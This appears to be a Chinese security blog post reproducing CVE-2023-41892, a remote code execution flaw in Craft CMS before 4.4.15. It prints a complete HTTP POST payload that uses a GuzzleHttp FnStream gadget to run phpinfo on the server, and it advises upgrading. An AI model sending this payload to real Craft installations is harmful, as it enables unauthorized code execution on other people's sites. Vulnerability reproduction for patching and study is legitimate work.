[漏洞复现] Craft (CVE-2023-41892)

这篇文章详细描述了CraftCMS4.4.15之前版本存在的代码注入漏洞,通过PHPinfo注入实现远程代码执行。建议用户尽快升级到4.4.15及以上版本以保障网站安全。
部署运行你感兴趣的模型镜像

前言

 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

一、漏洞情况分析

Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。

Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。

Craft CMS 是一个用于创建数字体验的平台。这是一种高影响力、低复杂性的攻击媒介。建议运行 4.4.15 之前的 Craft 安装的用户至少更新到该版本以缓解该问题。此问题已在 Craft CMS 4.4.15 中修复

二、漏洞复现

POST请求, phpinfo注入命令

POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

 后续的构造有点难这里就不演示了。User-Agent头传参防止被编码,第一次请求写入,第二次请求包含。不过第一次传错了,ta就会一直报错。要到第二天才能重新传。

后语

升级版本即可

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值